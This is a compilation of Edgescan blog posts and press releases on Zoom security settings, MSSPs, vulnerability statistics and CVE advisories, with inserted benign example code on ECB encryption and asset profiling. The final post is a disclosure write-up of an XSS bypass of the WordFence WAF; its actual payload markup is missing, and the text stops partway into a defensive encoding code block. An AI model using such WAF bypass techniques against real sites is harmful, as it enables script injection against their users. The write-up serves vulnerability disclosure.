Zoom acknowledges encryption problems and they proactively worked on this to address E2E encryption issues. Zoom indeed always supported TLSv1.2 for all its communications, but there was a weak cryptographic cipher. A single AES-128 key is used in ECB mode by all participants to encrypt and decrypt audio and video. The use of ECB mode is not recommended because patterns present in the plaintext are preserved during encryption.
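The ECB remark above, shown concretely as an added example (not part of the original post): a repeated 16-byte plaintext block encrypts to the same ciphertext block every time under ECB, while CBC with an IV hides the repetition. The block cipher is a small SHA-256-based Feistel network standing in for AES so the example runs without extra libraries; the ECB and CBC mode logic is the standard construction.

```python
"""Why ECB mode leaks structure: the same plaintext block always maps to the
same ciphertext block, so repetition in the input is visible in the output.
The block cipher here is a toy Feistel network built from SHA-256 (a stand-in
for AES, constructed for this example); the ECB/CBC mode logic is standard."""
import hashlib
import os

BLOCK = 16   # 128-bit block, like AES
ROUNDS = 8


def _round_keys(key):
    return [hashlib.sha256(key + bytes([i])).digest() for i in range(ROUNDS)]


def _f(rk, half):
    # Round function: keyed hash of one half, truncated to half a block.
    return hashlib.sha256(rk + half).digest()[:BLOCK // 2]


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def block_encrypt(key, block):
    """Encrypt one 16-byte block with the toy Feistel cipher."""
    l, r = block[:BLOCK // 2], block[BLOCK // 2:]
    for rk in _round_keys(key):
        l, r = r, _xor(l, _f(rk, r))
    return l + r


def block_decrypt(key, block):
    """Invert block_encrypt by running the rounds backwards."""
    l, r = block[:BLOCK // 2], block[BLOCK // 2:]
    for rk in reversed(_round_keys(key)):
        l, r = _xor(r, _f(rk, l)), l
    return l + r


def pad(data):
    """PKCS#7 padding so any message length fills whole blocks."""
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def _blocks(data):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def ecb_encrypt(key, plaintext):
    # ECB: every block encrypted independently, so equal blocks stay equal.
    return b"".join(block_encrypt(key, b) for b in _blocks(pad(plaintext)))


def ecb_decrypt(key, ciphertext):
    return unpad(b"".join(block_decrypt(key, b) for b in _blocks(ciphertext)))


def cbc_encrypt(key, plaintext, iv):
    # CBC: each block is XORed with the previous ciphertext block first.
    out, prev = [], iv
    for b in _blocks(pad(plaintext)):
        prev = block_encrypt(key, _xor(b, prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, ciphertext, iv):
    out, prev = [], iv
    for b in _blocks(ciphertext):
        out.append(_xor(block_decrypt(key, b), prev))
        prev = b
    return unpad(b"".join(out))


def distinct_blocks(ciphertext):
    """Number of different ciphertext blocks: repeated plaintext under ECB
    shows up as repeated ciphertext, which is the pattern leak."""
    return len(set(_blocks(ciphertext)))


if __name__ == "__main__":
    key = b"sixteen byte key"               # constructed demo key
    frame = b"MEETING STILL ON" * 4         # four identical blocks (constructed)
    print("ECB distinct blocks:", distinct_blocks(ecb_encrypt(key, frame)))
    print("CBC distinct blocks:", distinct_blocks(cbc_encrypt(key, frame, os.urandom(BLOCK))))
```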
It should be mentioned that even if a third party deliberately disables E2E encryption and initiates a meeting, if a guest then joins with E2E encryption enabled, this feature gets enforced and communication for both parties becomes encrypted.

Inconsistent Application of Security Policy

Advice to the Zoom team and Zoom users on anomalies with file sharing, recording, screen sharing and remote control:

File Sharing

File share can be disabled from the Zoom admin panel, and people from your organisation will then not be able to transfer files during Zoom chats/meetings. However, if a third-party host has this function enabled, it is possible to send files to all participant users (guests). If participants have file share disabled by their Admin and can't send files, they will still be able to receive and download files from the third-party host, which increases the risk of being sent malware or other malicious files.

Recording

If the Recording feature is disabled by your organisation's Zoom Admin and someone from your organisation is hosting a meeting, the recording feature will not be available for any party, including third parties. However, if a third-party host has this function enabled, then this function is available to all meeting participants (your organisation and the third party).

Screenshare + Remote Controlling

I would recommend reviewing the use of this function and disabling it if not required. By default, the 'Remote Control' feature is not disabled and locked by administrators. Enabling the Remote Control function for your organisation's participants or host users increases the risk of your members permitting third parties to take remote control over an internal host system and possibly access unintended information or your organisation's network resources. It should be noted that an end user must still grant permission to allow remote control of their system.
In summary

Most importantly, testing or using third-party software unethically is illegal, and authorisation should be sought prior to any activity. EternalBlue targeted thousands of Windows systems and more than 200K organisations suffered as a result of the EternalBlue vulnerability, but no one abandoned Windows systems and people still use them. WhatsApp also suffered from some serious vulnerabilities, but we still use it. As long as Zoom is taking action on all security concerns and tries to resolve issues as soon as possible, that's the main thing.

The Zoom free version comes with limited administrative access and might not give you full control over security controls and settings. If you choose to use a free licence you accept that it will not have the full range of features of the paid version. If you want those features, pay for them.

### What makes a great Managed Security Service Provider (MSSP)?

Organisations are rapidly looking at the support of a managed security service provider (MSSP) as an alternative to investing heavily in recruitment, staffing costs and finding a solution to the problem of staff retention. In fact, they see taking on an MSSP as an extension to their existing IT team, which can offer further cyber security expertise to maintain the company's security posture, ensure accuracy and improve effectiveness.

With an increasingly challenging threat landscape, being a successful MSSP can be a struggle. Making sure customers stay safe is critical to the success of your business, which is why understanding what makes a great MSSP is crucial for you to be able to make informed choices that will prove beneficial to the company.

Employ and maintain the right staff

If you're going to advertise the fact that you are experts in cyber security, then you need to make sure you employ staff who know what they are doing.
In too many cases, security operations centres (SoCs) employ staff with minimal or little experience in building, deploying and managing a system in a production environment. The reliance on tools alone is also a problem, as an SoC is only as good as the tooling and staff combined. The majority of SoC operations staff are not equipped with the skills an experienced consultant or determined attacker has in their armoury.

The retention ratio for MSSP staff is also problematic, as salaries for SoC staff are on the lower end of the cyber security pay scale. This is a big issue, as the SoC is at the forefront of an organisation's defence, and the staff are faced with actors of malicious intent on a daily basis. Your SoC and security teams are the first and last lines of defence against some pretty determined threat agents out in the wild, so make sure they feel valued. As we all know, there is a substantial cyber security skills gap, so if you have talented and experienced staff, keep them happy with benefits and incentives, and this will lead to contented customers.

Relaying accurate data

Making sure you're able to offer more accurate results is key to helping your customers' IT teams work in a more time-effective and efficient manner. Make sure you can give a truthful false positive rate alongside the various types of data you can offer. Being an MSSP is an outcome-driven service, so always deploy the best dashboards and application programming interfaces (APIs) available to clearly share the information you're receiving and help easily identify potential threats. There have been too many incidents where vulnerabilities have been classed as false negatives due to the SoC team not understanding the issue correctly.
"Your SoC and security teams are the first and last lines of defence against some pretty determined threat agents out in the wild – make sure they feel valued" Ryan Compagnone, Edgescan

Integration and output

Understand how each customer's reporting system works. Have the solutions in place to easily integrate clean, actionable data into their reporting processes, be it an SDL pipeline or ticketing. Remember, you're there to make things more efficient without missing any critical incidents, so offer a reporting system that will integrate with ease but will highlight any security issues without fail.

Measurement of success

Offer detailed reports on the breach attempts thwarted, malicious activity detected and vulnerabilities discovered. Measuring your success and relaying it back to the customer is the best way to demonstrate your value and maintain their trust in you. It is also a tool with which you can help your customers improve their security posture and offer additional services if needed.

Partnering with other security experts

To stay ahead of the volatile threat landscape and maintain a proactive approach to your customers' security needs means partnering with other security providers. It is now near impossible to offer all the tools needed to combat modern cyber security threats. As an MSSP, this is an opportunity you can capitalise on. Partnering with different security vendors which offer different solutions can help you grow your business, deliver a better service and generate high-value, increased recurring revenue business partnerships. You'll also be able to take advantage of a wealth of knowledge and support to deliver better business outcomes for your business and your customers.

As an MSSP, you'll be facing ever-increasing demand for security services, plus the need to rapidly deploy solutions as new threats occur.
To be a great MSSP, you'll need to demonstrate the ability to deliver a full portfolio of security services more competently and cost-effectively than your customers can do on their own. If you can deliver the above, then you will make a great MSSP, but also remember you can't deliver a full security service on your own. Make sure you work with the right people to guarantee business success.

### EDGESCAN AND RICHEY MAY JOIN FORCES

EDGESCAN AND RICHEY MAY PARTNER TO SUPPORT NORTH AMERICA'S FINANCIAL SERVICE AND REAL ESTATE INDUSTRIES

Edgescan today announces its partnership with Richey May Technology Solutions, which will see it continue the company's channel expansion into the North American market. The partnership supports Edgescan's growth within the financial services and real estate industries.

The partnership will allow Richey May Technology Solutions, an accounting and advisory firm, to offer Edgescan's Software-as-a-Service (SaaS) platform to its clients, delivering highly scalable, accurate and fullstack vulnerability management and intelligence.

Edgescan fullstack vulnerability management offers financial and real estate companies the assurance and confidence to automate highly accurate vulnerability data flows into key systems within the organisation, across both the network and application stack. Its API and integration capabilities, with an array of systems from SIEM, GRC, ticketing, instant alerting and messaging, provide clients with enterprise visibility when and where they need it.

"Every week we see breaches occurring in organisations that are compliant in highly regulated industries. Financial services and real estate are two of those industries," comments Eoin Keary, CEO of Edgescan. "Our solutions keep organisations fully compliant with continuous and comprehensive monitoring to detect vulnerability risk.
Working closely with Richey May, we can help increase the security posture of their clients and continue its good name as a trusted partner."

John-Thomas Gaietto, Executive Director of Cybersecurity Solutions at Richey May, said: "We're dedicated to offering our clients the expert tools needed to keep themselves secure above and beyond compliance regulations. Edgescan's offering does just that. It gives our clients the assurance and confidence to automate highly accurate vulnerability data so they can detect and deal with potential threats immediately. We look forward to working closely and growing our client base with Edgescan."

--END--

About Edgescan

Edgescan offers a Vulnerability Management Security as a Service (SaaS) solution. The edgescan™ SaaS security solution manages thousands of assets across the globe for both enterprise and SME clients, helping them to continuously detect, prioritise, monitor and fix security weaknesses for Internet-facing systems such as web applications, websites, mobile apps, servers, firewalls, VPNs or VoIP services. Due to analyst validation of all discovered vulnerabilities, the solution is highly accurate and virtually false positive free.

About Richey May

Founded in 1985, Richey May provides assurance, tax, technology and business advisory services to clients in the United States. Based in Denver, Colorado, the firm specialises in the financial services, mortgage banking, alternative investment, and real estate industries, and offers a wide range of tailored solutions to meet the needs of privately-held companies and their owners. For more information, visit www.richeymay.com.

### Edgescan COVID19 Response

The Irish government has taken the unprecedented step of closing all schools, universities, public gatherings and childcare facilities in response to the evolving Covid-19 pandemic. They have also asked that businesses adopt remote working practices where possible.
Here at Edgescan, we already operate with a highly mobile workforce and can fully function with our entire staff working remotely. We have a robust BC/DR plan and it is business as usual at Edgescan: we are fully operational and expect to remain so under the current restrictions and any planned escalation. We have also offered assistance to national agencies to assist in the fight against Covid-19.

Remote Working

We have seamlessly rolled out our remote working policy for the protection of our team and clients. Our team have the necessary equipment, can access our network and can remotely communicate with clients and each other in order to carry out their roles.

Meetings

Our offices are closed and, due to current public health guidelines, we are not travelling to client offices for meetings or consultancy. All operations are now carried out remotely and have been reorganised by the key personnel.

Can we help?

We want to help you and your organisation through this crisis. Please reach out if you need help or advice on how to maintain your security posture. Many of our clients have had to send staff home and may be exposed. As an MSSP we can help fill the gaps.

The two biggest issues for our clients, and how we can help:

1. Increased endpoints due to remote working - Edgescan will assess any live endpoint within any CIDR range under management, at no extra cost.
2. Offsite testing - Edgescan can handle internal testing through a jumpbox; our largest banking client is now being secured using this approach.

Take Care

We have been overwhelmed with the support and goodwill of our clients and team during this pandemic. We would urge you to take care of yourselves, your families and our community. We are all in this together and we will come out the other side. We want to reassure you that with Edgescan, you are in safe hands. If you have any queries or concerns, please utilise all of the normal communication channels or Contact Us here.
### Edgescan's 2020 Vulnerability Stats Report Released

Edgescan's 2020 Vulnerability Stats Report also reveals the time to patch vulnerabilities for an internet-facing system is now 71 days

Dublin, IRELAND – 18th February 2020 – Edgescan, the 'fullstack' Vulnerability Management Security as a Service (SaaS) solution provider, today releases its fifth Vulnerability Stats Report, looking at the state of fullstack security in 2019, based on tens of thousands of global assessments. The report has revealed that, in 2019, it took organisations an average of 50.55 days (nearly eight weeks) to remediate critical risk vulnerabilities for public internet-facing web applications and 49.26 days for internet-facing network layer critical risk vulnerabilities.

The report also found that high or critical risk vulnerabilities in external facing web applications had significantly increased, from 19.2 per cent in 2018 to 34.78 per cent in 2019. High or critical risk vulnerabilities discovered in externally facing network layer systems had also more than doubled in 2019, going up to 4.79 per cent from just 2 per cent the previous year.

"2019 saw more than 8 billion records breached, with some of the biggest breaches being experienced by Capital One, Quest Diagnostics, Houzz and Zynga. Many of these breaches were caused by web application layer vulnerabilities that could have been prevented if appropriate secure development and visibility practices were adhered to," comments Eoin Keary, CEO of Edgescan. "Although the time-to-remediate critical risk vulnerabilities for public internet facing web applications has reduced by just over 18 days since 2018, we are still seeing high rates of known and patchable vulnerabilities which have working exploits in the wild. This could be due to the fact it is hard to patch production systems.
Web application security is where the majority of risk still resides, and this is an area that organisations, no matter what size, should be taking notice of."

Further key findings from the report:

- A 20-year-old vulnerability was discovered still 'in the wild' in over 3500 systems across Europe and North America. Originally discovered in 1999, the CVE-1999-0517 vulnerability has a CVSS high severity risk score of 7.5 (out of 10) and the potential to cause a serious data breach.
- The most common CVE vulnerability in 2019 was first discovered in 2016, over four years ago. CVE-2016-2183 has a high severity risk score of 7.5 (out of 10) and makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session.
- On average, 67.8 per cent of assets had at least one CVE with a CVSS (v3.x) value of 4.0 or more, making them non-compliant with PCI regulations.

Contact media@edgescan.com edgescan.com

### Edgescan and Aon Deliver Global Fullstack Vulnerability Management

Edgescan Powers Aon's CyberScan Solution

Edgescan, the Fullstack Vulnerability Management Security as a Service (SaaS) solution provider, today announces it is working with leading global professional services firm Aon to support the cybersecurity posture of global clients. It enables Aon to leverage Edgescan's Software-as-a-Service (SaaS) platform, branded as CyberScan, to provide clients with highly scalable, accurate and fullstack vulnerability management and intelligence. The automated platform will also identify and rank unknown vulnerabilities in real time.

"In this highly-connected digital age, the speed at which the cyber landscape changes, working with Aon will enable us to combine our expertise and reach to improve the cybersecurity posture of Aon clients as well as continually looking at new ways of developing innovative solutions to strengthen our cyber defences," said Eoin Keary, Edgescan's founder and CEO.
"Aon is dedicated to delivering innovative solutions to help clients manage their cyber risk," comments Justin Clarke-Salt, Managing Director, Aon's Cyber Security. "Our CyberScan product will help clients identify, track, and remediate security vulnerabilities that, if unchecked, could lead to incidents that could cause significant financial and reputational damage."

About Edgescan

Edgescan offers a Vulnerability Management Security as a Service (SaaS) solution. The edgescan™ SaaS security solution manages thousands of assets across the globe for both enterprise and SME clients, helping them to continuously detect, prioritise, monitor and fix security weaknesses in Internet-facing systems such as web applications, websites, mobile apps, servers, firewalls, VPNs or VoIP services. Because analysts validate every discovered vulnerability, the solution is highly accurate and virtually false positive free.

About Aon plc

Aon plc (NYSE:AON) is a leading global professional services firm providing a broad range of risk, retirement and health solutions. With over 50,000 colleagues in 120 countries they empower results for clients by using proprietary data and analytics to deliver insights that reduce volatility and improve performance.

Contact media@edgescan.com

### CVE-2020-0601 Security Advice from Edgescan

Windows CVE-2020-0601

This blog explains CVE-2020-0601, how to identify if you are vulnerable and what, if anything, you need to do.

What is it?

A man-in-the-middle/spoofing vulnerability exists in Windows 10 and Windows Server 2016/2019. When an authenticated attacker is on the target system, they can use a spoofed code-signing certificate to sign malicious executables, making the file appear as if it is from a trusted source. This vulnerability is post-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could conduct man-in-the-middle attacks and decrypt encrypted traffic, such as traffic sent over HTTPS. To exploit this vulnerability, an attacker would need to be authenticated to the device.

Should I be worried?

You may be vulnerable if you have unpatched machines running Windows 10 or Windows Server 2016/2019.

What do I need to do?

Currently, there is no safe PoC for testing assets. Once a PoC is developed or available in the wild, Edgescan clients will be notified as soon as possible if they are vulnerable. You should also check your patching status for Windows 10 or Windows Server 2016/2019 against Microsoft's guidance: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601

NVD CVE advisory: https://nvd.nist.gov/vuln/detail/CVE-2020-0601

NSA advisory: https://media.defense.gov/2020/Jan/14/2002234275/-1/-1/0/CSA-WINDOWS-10-CRYPT-LIB-20190114.PDF

If you have any concerns please reach out to the Edgescan Team.

Take this opportunity to download the edgescan 2019 Vulnerability Stats Report.

### Continuous Asset Profiling

Something we are pretty proud of at Edgescan is our Continuous Asset Profiling service, which is part of every Edgescan license. We call it HIDE (Host Index, Discovery & Enumeration).

So what is it and why should I care?

HIDE provides continuous asset profiling across blocks of our clients' IPs. So rather than asking a client to specify individual IPs, Edgescan profiles entire IP blocks/ranges. But why do this? The reason we give our clients the ability to profile entire blocks is three-fold:

- HIDE can detect if a server/IP has gone live since the last round of continuous profiling.
- HIDE can detect if a new service/port or a firewall change has occurred on any asset profiled.
- HIDE can alert our client to any change in their external asset profile on an ongoing basis, using various methods such as SMS, email or an outgoing webhook.
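The three kinds of change listed above (a host going live, a new port/service, and an alert on any change) are the output of a comparison between two successive profiles of a block. The following is an added example of such a delta comparison written for this article; it is not Edgescan's HIDE code. The two snapshots are constructed sample data for the documentation block 203.0.113.0/28, and `profile_delta`, `query` and `alerts` are hypothetical names.

```python
"""Profile delta analysis between two rounds of block profiling.
Added example, not Edgescan code. Snapshots below are constructed sample data."""
from dataclasses import dataclass, field
from ipaddress import ip_address, ip_network

# Constructed sample: hosts that answered in the previous and current round,
# each with a fingerprinted OS and a port -> service map.
PREVIOUS = {
    "203.0.113.5":  {"os": "linux",   "ports": {22: "ssh", 443: "https"}},
    "203.0.113.9":  {"os": "linux",   "ports": {80: "http", 443: "https"}},
    "203.0.113.12": {"os": "windows", "ports": {3389: "rdp"}},
}
CURRENT = {
    "203.0.113.5":  {"os": "linux", "ports": {22: "ssh", 443: "https", 8080: "http-proxy"}},
    "203.0.113.9":  {"os": "linux", "ports": {80: "http", 443: "https"}},
    "203.0.113.14": {"os": "linux", "ports": {21: "ftp"}},   # appeared since last round
}


@dataclass
class Delta:
    new_hosts: list = field(default_factory=list)
    gone_hosts: list = field(default_factory=list)
    new_services: list = field(default_factory=list)      # (host, port, service)
    removed_services: list = field(default_factory=list)  # (host, port, service)
    changed_services: list = field(default_factory=list)  # (host, port, old, new)

    def is_empty(self) -> bool:
        return not any([self.new_hosts, self.gone_hosts, self.new_services,
                        self.removed_services, self.changed_services])


def in_scope(block: str, profile: dict) -> dict:
    """Keep only hosts inside the client's block; anything else is a profiling error."""
    net = ip_network(block)
    return {h: p for h, p in profile.items() if ip_address(h) in net}


def profile_delta(block: str, previous: dict, current: dict) -> Delta:
    """Compare two profiling rounds of one block and collect every change."""
    prev, cur = in_scope(block, previous), in_scope(block, current)
    d = Delta()
    d.new_hosts = sorted(set(cur) - set(prev), key=ip_address)
    d.gone_hosts = sorted(set(prev) - set(cur), key=ip_address)
    for host in sorted(set(prev) & set(cur), key=ip_address):
        pp, cp = prev[host]["ports"], cur[host]["ports"]
        for port in sorted(set(cp) - set(pp)):
            d.new_services.append((host, port, cp[port]))
        for port in sorted(set(pp) - set(cp)):
            d.removed_services.append((host, port, pp[port]))
        for port in sorted(set(pp) & set(cp)):
            if pp[port] != cp[port]:            # same port, different service banner
                d.changed_services.append((host, port, pp[port], cp[port]))
    for host in d.new_hosts:                    # every service on a new host is new exposure
        for port, svc in sorted(cur[host]["ports"].items()):
            d.new_services.append((host, port, svc))
    return d


def query(profile: dict, ports=(), os=None) -> list:
    """Filter a profile the way a portal query such as 'ports 80/443 open, Linux' would."""
    hits = [h for h, p in profile.items()
            if (os is None or p["os"] == os) and all(port in p["ports"] for port in ports)]
    return sorted(hits, key=ip_address)


def alerts(delta: Delta) -> list:
    """One alert line per change; an SMS/email/webhook sender would consume these."""
    lines = [f"NEW HOST {h}" for h in delta.new_hosts]
    lines += [f"HOST GONE {h}" for h in delta.gone_hosts]
    lines += [f"NEW SERVICE {h}:{p} ({s})" for h, p, s in delta.new_services]
    lines += [f"SERVICE REMOVED {h}:{p} ({s})" for h, p, s in delta.removed_services]
    lines += [f"SERVICE CHANGED {h}:{p} {o} -> {n}" for h, p, o, n in delta.changed_services]
    return lines


if __name__ == "__main__":
    for line in alerts(profile_delta("203.0.113.0/28", PREVIOUS, CURRENT)):
        print(line)
```

Hosts outside the declared block are dropped before comparison, so a mis-entered range cannot produce alerts about someone else's address space; a host that has disappeared is reported as well, because a server going dark is as much a change to the external profile as one coming up.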
If, as per traditional approaches to profiling, we only assess named endpoints, we don't get the full picture. HIDE eliminates network blind spots and is very good at identifying many blind-spot use cases, including:

- The dev team deploys a server for testing without the knowledge of security.
- A rogue exfiltration point is established, similar to an APT.
- A rogue service is deployed to exfiltrate data.

Detection is performed in Edgescan via profile DELTA ANALYSIS on a continuous basis, so we detect change in near real time. Via the portal, Edgescan users can query HIDE information across thousands of servers in seconds. This can be done by using our filtering API on the console. So if a user needs to query all systems with, say, “Ports 80/443 open running Linux” across thousands of servers, this can be done in seconds and downloaded as CSV, XLSX etc.

Clients with large estates (tens of thousands of IPs/servers) find this a very useful feature of Edgescan. Obviously our Edgescan API can also be used to query this information without using the GUI. Alerting is also configurable, so that DevOps staff can be alerted when defined incidents take place.

HIDE gives Edgescan clients the ability to monitor and profile systems and to alert them of any changes to their estate profile within minutes.

Have you used HIDE? Tell us what you think.

Please get in touch through the Edgescan Contact form for more information.

### Three Weeks to Vulnerability Management Maturity

As unbelievable as it sounds, that's all it takes to drastically improve your organisation's security posture when using Edgescan. Watch the video below to see how the experts at Edgescan lead you through three main steps in only three weeks.

Week 1 - Edgescan Onboarding

Your assets, including web apps, APIs, IPs, CIDR ranges and cloud, are all onboarded into Edgescan and organised the way you want. Alerting, events and continuous profiling are all enabled, so you instantly start to receive situational intelligence and visibility. Vulnerability assessment commences and you can see what's happening through the Edgescan dashboard. You're up and running already.

Week 2 - Edgescan Vulnerability Assessment

Vulnerability assessment has started and weaknesses and risks are being identified. All issues are validated by our experts, so there are no false positives and your organisation is supported by the Edgescan team. Continuous asset profiling is providing you with complete visibility. Events are being alerted to your team based on what matters to you. You have full control.

Week 3 - Edgescan API Integration

Integration of the Edgescan cloud API with your internal ticketing systems. Edgescan delivers tickets and alerts based on the security intelligence that matters to you. Vulnerabilities are being reported and your team is fixing them based on priority. You are requesting retests on demand to verify fixes by simply pressing a button. You are generating WAF rules automatically where required, to virtually patch discovered issues.

Congratulations! You are now well on the way to fullstack vulnerability management maturity in only 3 weeks with Edgescan.

So what are you waiting for? Contact us now and our experts will have you up and running in no time. Don't forget to subscribe to our YouTube Channel to keep up to date with Edgescan.

### Edgescan Launches Attention Index Metric

Innovation never ends at edgescan, and we are constantly improving value to our clients and making our products and services as good as they can be. Edgescan's most recent deployment is the Attention Index metric. An asset's Attention Index is a value between 0 and 100 that indicates how much attention or 'love' the client gives to that asset. It is an abstract measurement that is calculated from edgescan's vulnerability data.
The Attention Index is shown in a new widget on the left of the metrics page. The widget displays the assets with the 10 highest scores (also known as Most Loved Assets) and the 10 lowest. If there are multiple assets with a perfect or zero score, they are grouped. There is an Excel export function where all assets and scores can be viewed.

The idea is to present a list of the client's assets which are receiving the most 'attention'; the severity of the vulnerabilities is not a consideration. The beauty of the Attention Index is that it gives an instant overview of a large number of assets and of the volume of vulnerabilities being resolved. The 'most loved assets' can be easily accessed by clicking on the link in the index.

The Attention Index data can be exported for use in reports and charts. The information is recorded over time, so that changes in position are highlighted by green (up) or red (down) arrows for clear, at-a-glance information. To date, the feedback has been hugely positive, as those responsible for a large number of assets can easily see how their resources are being utilised. Ideally, an organisation's most critical assets should also be the most 'loved'.

Have you taken a look at edgescan's new Attention Index? Tell us what you think.

Please get in touch through the Edgescan Contact form for more information.

Strengthening Your Defense with ASM

The Attack Surface Management (ASM) service from Edgescan provides continuous visibility into your digital landscape, helping you proactively secure your attack surface. With our new Attention Index Metric, we enable you to focus on the most critical threats and vulnerabilities. With offices in Dublin and New York, Edgescan delivers real-time insights for smarter security decisions.

### edgescan Wins at Tech Excellence Awards 2019

On Thursday 23rd May, the 19th annual Tech Excellence Awards event was held at Citywest Hotel in Dublin. More than 600 luminaries from the technology sector gathered to celebrate another year of innovation and commercial success at home and abroad. edgescan had been shortlisted for Managed Security Service Provider of the Year along with Integrity360, Novi and Zinopy. This award recognises an outstanding service provider in this market space who can demonstrate both technical acumen and solid business performance.

It was one of the last announcements of the night, so tensions were running high, but the edgescan team did what they could to calm the nerves. Eventually, it was announced that edgescan would be awarded Managed Security Service Provider of the Year 2019, and Eoin, Rahim and Owen graciously accepted the award on behalf of everyone at edgescan/BCC Risk Advisory. Eoin thanked everyone at edgescan for 'all your hard work in getting this small company to where it is today'.

The Tech Excellence Awards is Ireland’s principal badge of honour in the IT industry. The awards programme recognises excellence not only in implementing tech solutions, but also in the business of marketing and implementing technology for business. Thanks to TechTrade for sponsoring our award and to TechExcellence for putting on such an enjoyable night.

### edgescan is CREST Approved for Penetration Testing

BCC Risk Advisory/edgescan recently applied to CREST for accreditation of our Penetration Testing services. CREST is a not-for-profit accreditation and certification body that represents and supports the technical information security industry. CREST provides internationally recognised accreditation for organisations providing technical security services, and professional-level certifications for individuals providing penetration testing, cyber incident response, threat intelligence and security operations centre (SOC) services.
CREST Member companies undergo regular and stringent assessment, whilst CREST certified individuals undertake rigorous examinations to demonstrate the highest levels of knowledge, skill and competence. To ensure currency of knowledge in fast-changing technical security environments, the certification process is repeated every three years.

We are proud to announce that the edgescan Penetration Testing service met the high standards set by CREST and achieved accreditation.

“We are delighted to welcome edgescan as a new CREST Member company,” said Ian Glover, President of CREST. “To become a CREST Member, companies go through a very demanding assessment process, and through accreditation for its penetration testing services, edgescan is demonstrating its commitment to consistently delivering the highest levels of professional security services.”

What does this mean?

BCC Risk Advisory/edgescan is now the only ISO 27001 and CREST certified Pen Testing Platform on the market doing what we do. This creates huge benefits for the edgescan™ service within the global market and further bolsters our channel approach to support partners who may not have access to Pen Testing resources. This is further evidence of the quality of our services and of the hard work and commitment of the edgescan and BCC Risk Advisory team.

View this link to see the BCC Risk Advisory/edgescan CREST Approved listing.

### Selecting a Vulnerability Management MSSP Partner

Challenges facing MSSP clients:

Many organisations looking for a Managed Security Service Provider (MSSP) do so in order to save on staffing costs, solve the challenges of staff retention, and gain accuracy and effectiveness improvements. Do you know what you are getting when engaging with a managed security provider? Are they experts in "everything security" or specialists in specific aspects of cyber?

Many MSSPs offer complex or vague descriptions of their service offerings in order to give the impression they "do it all" ever so well. The reality is just not the case. Many Security Operations Centre (SOC)-as-a-service providers employ folks with minimal or no experience in building, deploying and managing a system in a production environment. Reliance on tools alone is also a problem, as a SOC is only as good as the tooling and staff combined. The majority of SOC operations staff are not equipped with the skills an experienced consultant or determined attacker has in their armoury. Tools also produce vast amounts of white noise, which in effect are false positives, and, even worse, false negatives can occur.

The retention ratio for MSSP staff is also problematic, as salaries for SOC staff are on the lower end of the cyber security pay scale. This gives rise to concerns, given that the SOC is the monitoring and threat detection centre for an organisation and in effect faces off with actors of malicious intent on a daily basis. Bottom line: your cyber security staff are your last line of defence against some pretty determined threat agents out in the wild.

Features to look out for in choosing an MSSP partner:

Data Quality: Accuracy results in less effort and greater efficiency. Tooling is simply a conduit to view events. Promoting events to incidents takes time and skill. Tuning tools also takes time and skill. What is the false positive rate for a given solution? Ask what types of data will be shared, and what dashboards or APIs are available in order to consume such information. MSSP is an outcome-driven service after all. I've seen vulnerabilities being classed as "False Negatives" due to the SOC team not understanding the issue correctly and not being able to reproduce the issue.

Integration and output: Understand how clean, actionable data can be integrated into your organisation's systems. Be it an SDL pipeline or a ticketing system, can the MSSP integrate with your systems with ease?

Measure Success: How can the MSSP provide metrics which you can use to measure success? Breach attempts thwarted? Malicious activity detected, vulnerabilities discovered, vulnerabilities mitigated? Can the data provide insight into what success looks like? We can improve what we can measure. Clear communication to the business on the value of the service, and on the investment in time and budget, is key to garnering support for cyber security. MSSPs should be able to help you with this challenge.

Evolving with API Security Testing

When it comes to securing your API infrastructure, Edgescan’s API Security Testing ensures that your APIs are protected against the latest vulnerabilities. We help you stay ahead of emerging threats with comprehensive security testing. From our offices in Dublin and New York, we provide tailored API security solutions that evolve with your needs.

### Popular WordPress WAF bypass zero-day discovered by Edgescan

WordFence WAF XSS Bypass – CVE-2019-9669, by Anthony Yalcin

A Web Application Firewall (WAF) is an application firewall that filters, monitors, and blocks malicious HTTP traffic. By inspecting HTTP traffic, it can prevent attacks related to web application security flaws, such as SQL injection, cross-site scripting (XSS), and security misconfigurations. WAFs may come in the form of an appliance, server plugin, or filter, and may be customised to an application.

WordFence is a WordPress security plugin that includes an endpoint firewall and a malware scanner. The WAF attempts to identify and block malicious traffic and additionally performs real-time IP blacklisting of malicious IPs.

During a penetration test of a web application built on WordPress, we noted that the target application was being protected by the WordFence WAF.
We discovered that a URL query string parameter value was being reflected in the immediate response from the application server. The WordFence WAF blocked us while we attempted to inject malicious JavaScript into the parameter value. By using a specially crafted payload, we were able to bypass the WordFence WAF and inject malicious JavaScript into the web application.

The Discovery

The first step in finding this vulnerability was to identify a valid injection point by crawling through the site and observing which endpoints reflect user input in the response. After crawling the site, we noted that the query string parameter (q) is reflected in the response. By injecting basic HTML we can see that there is a lack of input validation or output encoding on this parameter value.

The Analysis

Now that we have our injection point, we need to find a payload that will not trigger the WAF. Performing basic tests for XSS, such as injecting [payload not preserved in this copy], triggered the WAF. The examples below show that the WordFence WAF is protecting the application against basic XSS payloads.

The Bypass

After trying multiple payloads, it was noted that it was possible to inject an anchor tag including the href attribute. For example: test [anchor markup not preserved in this copy; only the link text remains]

The WAF was triggered when “javascript” followed by “:” was injected into the href attribute. Below are a few of the attempts made to bypass this WAF ruleset (as above, only the link text of each attempt survives):

- test
- test
- test
- test

Working payload: please%20click%20here

Payload breakdown:

- URL decoded: please click here
- HTML decoded (note the new line): please click here

Outcome

Web application firewalls may not fully protect your sites from these types of attacks. They do, however, slow attackers down. A motivated attacker will spend as much time as they need to exploit these types of vulnerabilities. WAFs offer many types of protection, such as protection against known attacks or vulnerabilities based on blacklists.
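The fix for the reflected `q` parameter above is on the application side, not in the WAF: encode the value for the context it lands in, and never let user input choose a link's scheme. The block below is an added example written for this article (it is not Edgescan's or WordFence's code); `render_search_page`, `safe_href` and the encoders are hypothetical names, and the page template is constructed to show the three reflection contexts.

```python
"""Context-aware output encoding of a reflected query parameter.
Added example, not Edgescan or WordFence code."""
import json
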